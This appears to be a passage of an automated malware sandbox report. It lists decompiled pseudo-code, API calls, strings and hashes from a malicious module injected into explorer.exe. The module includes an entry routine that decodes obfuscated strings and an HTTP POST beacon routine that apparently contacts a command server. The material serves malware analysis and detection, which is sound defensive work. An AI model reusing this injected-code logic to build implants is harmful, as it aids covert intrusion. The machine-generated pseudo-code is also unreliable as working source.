                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                                          • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                                          • API String ID: 3082384575-2319545179
                                          • Opcode ID: 5474bce5d18d4943309ca91fb3254532eb6dfdcf916d9e8241832134b147adef
                                          • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
                                          • Opcode Fuzzy Hash: 5474bce5d18d4943309ca91fb3254532eb6dfdcf916d9e8241832134b147adef
                                          • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                                          				char _v8;
                                          				char _v16;
                                          				short _v144;
                                          				short _v664;
                                          				void* _t19;
                                          				struct HINSTANCE__* _t22;
                                          				long _t23;
                                          				long _t24;
                                          				char* _t27;
                                          				WCHAR* _t32;
                                          				long _t33;
                                          				intOrPtr _t37;
                                          				intOrPtr _t38;
                                          				void* _t49;
                                          				int _t53;
                                          				void* _t54;
                                          				intOrPtr* _t55;
                                          				void* _t57;
                                          
                                          				_t49 = __edx;
                                          				OutputDebugStringA("Hello qqq");
                                          				if(_a8 != 1) {
                                          					if(_a8 != 0) {
                                          						L12:
                                          						return 1;
                                          					}
                                          					SetLastError(0xaa);
                                          					L10:
                                          					return 0;
                                          				}
                                          				E000885EF();
                                          				_t19 = E0008980C( &_v16);
                                          				_t57 = _t49;
                                          				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                                          					goto L12;
                                          				} else {
                                          					E00088F78();
                                          					GetModuleHandleA(0);
                                          					_t22 = _a4;
                                          					 *0x9e69c = _t22;
                                          					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                                          					_t24 = GetLastError();
                                          					if(_t23 != 0 && _t24 != 0x7a) {
                                          						memset( &_v144, 0, 0x80);
                                          						_t55 = _t54 + 0xc;
                                          						_t53 = 0;
                                          						do {
                                          							_t27 = E000895C7(_t53);
                                          							_a8 = _t27;
                                          							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                                          							E000885C2( &_a8);
                                          							_t53 = _t53 + 1;
                                          						} while (_t53 < 0x2710);
                                          						E00092A5B( *0x9e69c);
                                          						 *_t55 = 0x7c3;
                                          						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
                                          						 *_t55 = 0xb4e;
                                          						_t32 = E000895E1(0x9ba28);
                                          						_a8 = _t32;
                                          						_t33 = GetFileAttributesW(_t32);
                                          						_push( &_a8);
                                          						if(_t33 == 0xffffffff) {
                                          							E000885D5();
                                          							_v8 = 0;
                                          							_t37 =  *0x9e684; // 0x34f8f0
                                          							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
                                          							 *0x9e6a8 = _t38;
                                          							if(_t38 == 0) {
                                          								goto L10;
                                          							}
                                          							goto L12;
                                          						}
                                          						E000885D5();
                                          					}
                                          					goto L10;
                                          				}
                                          			}


                                          APIs
                                          • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
                                          • SetLastError.KERNEL32(000000AA), ref: 000860D7
                                            • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                                            • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                                            • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
                                          • GetLastError.KERNEL32 ref: 00085FEF
                                          • memset.MSVCRT ref: 00086013
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
                                          • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                                          • String ID: Hello qqq
                                          • API String ID: 1203100507-3610097158
                                          • Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                                          • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
                                          • Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                                          • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                          				char _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				char _v24;
                                          				intOrPtr _v28;
                                          				char _v32;
                                          				intOrPtr _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				intOrPtr _v48;
                                          				intOrPtr _v52;
                                          				intOrPtr _v56;
                                          				intOrPtr _v60;
                                          				char _v64;
                                          				int _v76;
                                          				void* _v80;
                                          				intOrPtr _v100;
                                          				int _v104;
                                          				void* _v108;
                                          				intOrPtr _v112;
                                          				intOrPtr _v116;
                                          				char* _v120;
                                          				void _v124;
                                          				char _v140;
                                          				void _v396;
                                          				void _v652;
                                          				intOrPtr _t105;
                                          				intOrPtr _t113;
                                          				intOrPtr* _t115;
                                          				intOrPtr _t118;
                                          				intOrPtr _t121;
                                          				intOrPtr _t124;
                                          				intOrPtr _t127;
                                          				intOrPtr _t131;
                                          				char _t133;
                                          				intOrPtr _t136;
                                          				char _t138;
                                          				char _t139;
                                          				intOrPtr _t141;
                                          				intOrPtr _t147;
                                          				intOrPtr _t154;
                                          				intOrPtr _t158;
                                          				intOrPtr _t162;
                                          				intOrPtr _t164;
                                          				intOrPtr _t166;
                                          				intOrPtr _t172;
                                          				intOrPtr _t176;
                                          				void* _t183;
                                          				void* _t185;
                                          				intOrPtr _t186;
                                          				char _t195;
                                          				intOrPtr _t203;
                                          				intOrPtr _t204;
                                          				signed int _t209;
                                          				void _t212;
                                          				intOrPtr _t213;
                                          				void* _t214;
                                          				intOrPtr _t216;
                                          				char _t217;
                                          				intOrPtr _t218;
                                          				signed int _t219;
                                          				signed int _t220;
                                          				void* _t221;
                                          
                                          				_v40 = _v40 & 0x00000000;
                                          				_v24 = 4;
                                          				_v36 = 1;
                                          				_t214 = __edx;
                                          				memset( &_v396, 0, 0x100);
                                          				memset( &_v652, 0, 0x100);
                                          				_v64 = E000895C7(0x85b);
                                          				_v60 = E000895C7(0xdc9);
                                          				_v56 = E000895C7(0x65d);
                                          				_v52 = E000895C7(0xdd3);
                                          				_t105 = E000895C7(0xb74);
                                          				_v44 = _v44 & 0;
                                          				_t212 = 0x3c;
                                          				_v48 = _t105;
                                          				memset( &_v124, 0, 0x100);
                                          				_v116 = 0x10;
                                          				_v120 =  &_v140;
                                          				_v124 = _t212;
                                          				_v108 =  &_v396;
                                          				_v104 = 0x100;
                                          				_v80 =  &_v652;
                                          				_push( &_v124);
                                          				_push(0);
                                          				_v76 = 0x100;
                                          				_push(E0008C379(_t214));
                                          				_t113 =  *0x9e6a4; // 0x32f4d0
                                          				_push(_t214);
                                          				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                                          					_t209 = 0;
                                          					_v20 = 0;
                                          					do {
                                          						_t115 =  *0x9e6a4; // 0x32f4d0
                                          						_v12 = 0x8404f700;
                                          						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                                          						if(_t213 != 0) {
                                          							_t195 = 3;
                                          							_t185 = 4;
                                          							_v8 = _t195;
                                          							_t118 =  *0x9e6a4; // 0x32f4d0
                                          							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                                          							_v8 = 0x3a98;
                                          							_t121 =  *0x9e6a4; // 0x32f4d0
                                          							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                                          							_v8 = 0x493e0;
                                          							_t124 =  *0x9e6a4; // 0x32f4d0
                                          							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                                          							_v8 = 0x493e0;
                                          							_t127 =  *0x9e6a4; // 0x32f4d0
                                          							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                                          							_t131 =  *0x9e6a4; // 0x32f4d0
                                          							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                                          							if(_a24 != 0) {
                                          								E0008980C(_a24);
                                          							}
                                          							if(_t186 != 0) {
                                          								_t133 = 0x8484f700;
                                          								if(_v112 != 4) {
                                          									_t133 = _v12;
                                          								}
                                          								_t136 =  *0x9e6a4; // 0x32f4d0
                                          								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                                          								_v8 = _t216;
                                          								if(_a24 != 0) {
                                          									E0008980C(_a24);
                                          								}
                                          								if(_t216 != 0) {
                                          									_t138 = 4;
                                          									if(_v112 != _t138) {
                                          										L19:
                                          										_t139 = E000895C7(0x777);
                                          										_t217 = _t139;
                                          										_v12 = _t217;
                                          										_t141 =  *0x9e6a4; // 0x32f4d0
                                          										_t218 = _v8;
                                          										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
                                          										E000885C2( &_v12);
                                          										if(_a24 != 0) {
                                          											E0008980C(_a24);
                                          										}
                                          										if(_v28 != 0) {
                                          											L28:
                                          											_v24 = 8;
                                          											_push(0);
                                          											_v32 = 0;
                                          											_v28 = 0;
                                          											_push( &_v24);
                                          											_push( &_v32);
                                          											_t147 =  *0x9e6a4; // 0x32f4d0
                                          											_push(0x13);
                                          											_push(_t218);
                                          											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                                          												_t219 = E00089749( &_v32);
                                          												if(_t219 == 0xc8) {
                                          													 *_a20 = _v8;
                                          													 *_a12 = _t213;
                                          													 *_a16 = _t186;
                                          													return 0;
                                          												}
                                          												_t220 =  ~_t219;
                                          												L32:
                                          												_t154 =  *0x9e6a4; // 0x32f4d0
                                          												 *((intOrPtr*)(_t154 + 8))(_v8);
                                          												L33:
                                          												if(_t186 != 0) {
                                          													_t158 =  *0x9e6a4; // 0x32f4d0
                                          													 *((intOrPtr*)(_t158 + 8))(_t186);
                                          												}
                                          												if(_t213 != 0) {
                                          													_t203 =  *0x9e6a4; // 0x32f4d0
                                          													 *((intOrPtr*)(_t203 + 8))(_t213);
                                          												}
                                          												return _t220;
                                          											}
                                          											GetLastError();
                                          											_t220 = 0xfffffff8;
                                          											goto L32;
                                          										} else {
                                          											GetLastError();
                                          											_t162 =  *0x9e6a4; // 0x32f4d0
                                          											 *((intOrPtr*)(_t162 + 8))(_t218);
                                          											_t218 = 0;
                                          											goto L23;
                                          										}
                                          									}
                                          									_v12 = _t138;
                                          									_push( &_v12);
                                          									_push( &_v16);
                                          									_t172 =  *0x9e6a4; // 0x32f4d0
                                          									_push(0x1f);
                                          									_push(_t216);
                                          									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                                          										L18:
                                          										GetLastError();
                                          										goto L19;
                                          									}
                                          									_v16 = _v16 | 0x00003380;
                                          									_push(4);
                                          									_push( &_v16);
                                          									_t176 =  *0x9e6a4; // 0x32f4d0
                                          									_push(0x1f);
                                          									_push(_t216);
                                          									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                                          										goto L19;
                                          									}
                                          									goto L18;
                                          								} else {
                                          									GetLastError();
                                          									L23:
                                          									_t164 =  *0x9e6a4; // 0x32f4d0
                                          									 *((intOrPtr*)(_t164 + 8))(_t186);
                                          									_t186 = 0;
                                          									goto L24;
                                          								}
                                          							} else {
                                          								GetLastError();
                                          								L24:
                                          								_t166 =  *0x9e6a4; // 0x32f4d0
                                          								 *((intOrPtr*)(_t166 + 8))(_t213);
                                          								_t213 = 0;
                                          								goto L25;
                                          							}
                                          						}
                                          						GetLastError();
                                          						L25:
                                          						_t204 = _t218;
                                          						_t209 = _v20 + 1;
                                          						_v20 = _t209;
                                          					} while (_t209 < 2);
                                          					_v8 = _t218;
                                          					if(_t204 != 0) {
                                          						goto L28;
                                          					}
                                          					_t220 = 0xfffffffe;
                                          					goto L33;
                                          				}
                                          				_t183 = 0xfffffffc;
                                          				return _t183;
                                          			}

                                          0x0008e7da
                                          0x0008e7e2
                                          0x0008e7ea
                                          0x0008e7ff
                                          0x0008e80c
                                          0x0008e80e
                                          0x0008e813
                                          0x0008e813
                                          0x0008e81a
                                          0x0008e82b
                                          0x0008e830
                                          0x0008e832
                                          0x0008e832
                                          0x0008e846
                                          0x0008e858
                                          0x0008e85a
                                          0x0008e85d
                                          0x0008e862
                                          0x0008e862
                                          0x0008e869
                                          0x0008e878
                                          0x0008e87c
                                          0x0008e8ba
                                          0x0008e8bf
                                          0x0008e8c7
                                          0x0008e8cc
                                          0x0008e8d7
                                          0x0008e8dd
                                          0x0008e8e7
                                          0x0008e8ea
                                          0x0008e8f3
                                          0x0008e8f8
                                          0x0008e8f8
                                          0x0008e901
                                          0x0008e94a
                                          0x0008e94c
                                          0x0008e953
                                          0x0008e954
                                          0x0008e957
                                          0x0008e95d
                                          0x0008e961
                                          0x0008e962
                                          0x0008e967
                                          0x0008e969
                                          0x0008e96f
                                          0x0008e984
                                          0x0008e98c
                                          0x0008e9c1
                                          0x0008e9c6
                                          0x0008e9cb
                                          0x00000000
                                          0x0008e9cd
                                          0x0008e98e
                                          0x0008e990
                                          0x0008e990
                                          0x0008e999
                                          0x0008e99c
                                          0x0008e99e
                                          0x0008e9a0
                                          0x0008e9a6
                                          0x0008e9a6
                                          0x0008e9ab
                                          0x0008e9ad
                                          0x0008e9b4
                                          0x0008e9b4
                                          0x00000000
                                          0x0008e9b7
                                          0x0008e971
                                          0x0008e979
                                          0x00000000
                                          0x0008e903
                                          0x0008e903
                                          0x0008e909
                                          0x0008e90f
                                          0x0008e912
                                          0x00000000
                                          0x0008e912
                                          0x0008e901
                                          0x0008e87e
                                          0x0008e884
                                          0x0008e888
                                          0x0008e889
                                          0x0008e88e
                                          0x0008e890
                                          0x0008e896
                                          0x0008e8b4
                                          0x0008e8b4
                                          0x00000000
                                          0x0008e8b4
                                          0x0008e898
                                          0x0008e8a2
                                          0x0008e8a4
                                          0x0008e8a5
                                          0x0008e8aa
                                          0x0008e8ac
                                          0x0008e8b2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0008e86b
                                          0x0008e86b
                                          0x0008e914
                                          0x0008e914
                                          0x0008e91a
                                          0x0008e91d
                                          0x00000000
                                          0x0008e91d
                                          0x0008e81c
                                          0x0008e81c
                                          0x0008e91f
                                          0x0008e91f
                                          0x0008e925
                                          0x0008e928
                                          0x00000000
                                          0x0008e928
                                          0x0008e81a
                                          0x0008e785
                                          0x0008e92a
                                          0x0008e92d
                                          0x0008e92f
                                          0x0008e932
                                          0x0008e935
                                          0x0008e93e
                                          0x0008e943
                                          0x00000000
                                          0x00000000
                                          0x0008e947
                                          0x00000000
                                          0x0008e947
                                          0x0008e754
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset$ErrorLast
                                          • String ID: POST
                                          • API String ID: 2570506013-1814004025
                                          • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                                          • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
                                          • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                                          • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E000916B8(signed int* _a4) {
                                          				char _v8;
                                          				_Unknown_base(*)()* _v12;
                                          				_Unknown_base(*)()* _v16;
                                          				char _v20;
                                          				_Unknown_base(*)()* _t16;
                                          				_Unknown_base(*)()* _t17;
                                          				void* _t22;
                                          				intOrPtr* _t28;
                                          				signed int _t29;
                                          				signed int _t30;
                                          				struct HINSTANCE__* _t32;
                                          				void* _t34;
                                          
                                          				_t30 = 0;
                                          				_v8 = 0;
                                          				_t32 = GetModuleHandleA("advapi32.dll");
                                          				if(_t32 == 0) {
                                          					L9:
                                          					return 1;
                                          				}
                                          				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                                          				_v12 = _t16;
                                          				if(_t16 == 0) {
                                          					goto L9;
                                          				}
                                          				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                                          				_v16 = _t17;
                                          				if(_t17 == 0) {
                                          					goto L9;
                                          				}
                                          				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                                          				if(_t28 == 0) {
                                          					goto L9;
                                          				}
                                          				_push(0xf0000000);
                                          				_push(1);
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v8);
                                          				if(_v12() == 0) {
                                          					goto L9;
                                          				}
                                          				_t22 = _v16(_v8, 4,  &_v20);
                                          				 *_t28(_v8, 0);
                                          				if(_t22 == 0) {
                                          					goto L9;
                                          				}
                                          				_t29 = 0;
                                          				do {
                                          					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                                          					_t29 = _t29 + 1;
                                          				} while (_t29 < 4);
                                          				 *_a4 = _t30;
                                          				return 0;
                                          			}

                                          APIs
                                          • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
                                          • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
                                          • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                          • API String ID: 667068680-129414566
                                          • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                                          • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
                                          • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                                          • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                          				signed int _t12;
                                          				signed int _t13;
                                          				int _t15;
                                          				char* _t24;
                                          				char* _t26;
                                          				char* _t28;
                                          				char* _t29;
                                          				signed int _t40;
                                          				char* _t43;
                                          				char* _t45;
                                          				long long* _t47;
                                          
                                          				_t12 = _a20;
                                          				if(_t12 == 0) {
                                          					_t12 = 0x11;
                                          				}
                                          				_t26 = _a4;
                                          				_push(_t30);
                                          				 *_t47 = _a12;
                                          				_push(_t12);
                                          				_push("%.*g");
                                          				_push(_a8);
                                          				_push(_t26);
                                          				L00092285();
                                          				_t40 = _t12;
                                          				if(_t40 < 0 || _t40 >= _a8) {
                                          					L19:
                                          					_t13 = _t12 | 0xffffffff;
                                          					goto L20;
                                          				} else {
                                          					L000922CD();
                                          					_t15 =  *((intOrPtr*)( *_t12));
                                          					if(_t15 != 0x2e) {
                                          						_t24 = strchr(_t26, _t15);
                                          						if(_t24 != 0) {
                                          							 *_t24 = 0x2e;
                                          						}
                                          					}
                                          					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                                          						L11:
                                          						_t43 = strchr(_t26, 0x65);
                                          						_t28 = _t43;
                                          						if(_t43 == 0) {
                                          							L18:
                                          							_t13 = _t40;
                                          							L20:
                                          							return _t13;
                                          						}
                                          						_t45 = _t43 + 1;
                                          						_t29 = _t28 + 2;
                                          						if( *_t45 == 0x2d) {
                                          							_t45 = _t29;
                                          						}
                                          						while( *_t29 == 0x30) {
                                          							_t29 = _t29 + 1;
                                          						}
                                          						if(_t29 != _t45) {
                                          							E00088706(_t45, _t29, _t40 - _t29 + _a4);
                                          							_t40 = _t40 + _t45 - _t29;
                                          						}
                                          						goto L18;
                                          					} else {
                                          						_t6 = _t40 + 3; // 0x909b2
                                          						_t12 = _t6;
                                          						if(_t12 >= _a8) {
                                          							goto L19;
                                          						}
                                          						_t26[_t40] = 0x302e;
                                          						( &(_t26[2]))[_t40] = 0;
                                          						_t40 = _t40 + 2;
                                          						goto L11;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strchr$_snprintflocaleconv
                                          • String ID: %.*g
                                          • API String ID: 1910550357-952554281
                                          • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                                          • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
                                          • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                                          • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _snprintfqsort
                                          • String ID: %I64d$false$null$true
                                          • API String ID: 756996078-4285102228
                                          • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                                          • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
                                          • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                                          • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
                                          • SysAllocString.OLEAUT32(?), ref: 0008D764
                                          • SysAllocString.OLEAUT32(00000000), ref: 0008D778
                                          • SysFreeString.OLEAUT32(?), ref: 0008D7F3
                                          • SysFreeString.OLEAUT32(?), ref: 0008D7F6
                                          • SysFreeString.OLEAUT32(?), ref: 0008D7FB
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                                          • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
                                          • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                                          • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: @$\u%04X$\u%04X\u%04X
                                          • API String ID: 0-2132903582
                                          • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                                          • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
                                          • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                                          • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 30%
                                          			E0008D523(void* __ecx) {
                                          				char _v8;
                                          				void* _v12;
                                          				char* _t15;
                                          				intOrPtr* _t16;
                                          				void* _t21;
                                          				intOrPtr* _t23;
                                          				intOrPtr* _t24;
                                          				intOrPtr* _t25;
                                          				void* _t30;
                                          				void* _t33;
                                          
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                          				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                          				_t15 =  &_v12;
                                          				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
                                          				if(_t15 < 0) {
                                          					L5:
                                          					_t23 = _v8;
                                          					if(_t23 != 0) {
                                          						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                          					}
                                          					_t24 = _v12;
                                          					if(_t24 != 0) {
                                          						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                          					}
                                          					_t16 = 0;
                                          				} else {
                                          					__imp__#2(__ecx);
                                          					_t25 = _v12;
                                          					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                          					if(_t21 < 0) {
                                          						goto L5;
                                          					} else {
                                          						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                          						if(_t21 < 0) {
                                          							goto L5;
                                          						} else {
                                          							_t16 = E00088604(8);
                                          							if(_t16 == 0) {
                                          								goto L5;
                                          							} else {
                                          								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                          								 *_t16 = _v8;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t16;
                                          			}

                                          APIs
                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                                          • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                                          • SysAllocString.OLEAUT32(00000000), ref: 0008D569
                                          • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                                            • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                          • String ID:
                                          • API String ID: 1610782348-0
                                          • Opcode ID: 10b5e74f8a59f27958c0d6474d468863946cdabe288dbe1f51fb48886bb044ac
                                          • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
                                          • Opcode Fuzzy Hash: 10b5e74f8a59f27958c0d6474d468863946cdabe288dbe1f51fb48886bb044ac
                                          • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
                                          Uniqueness

                                          Uniqueness Score: -1.00%

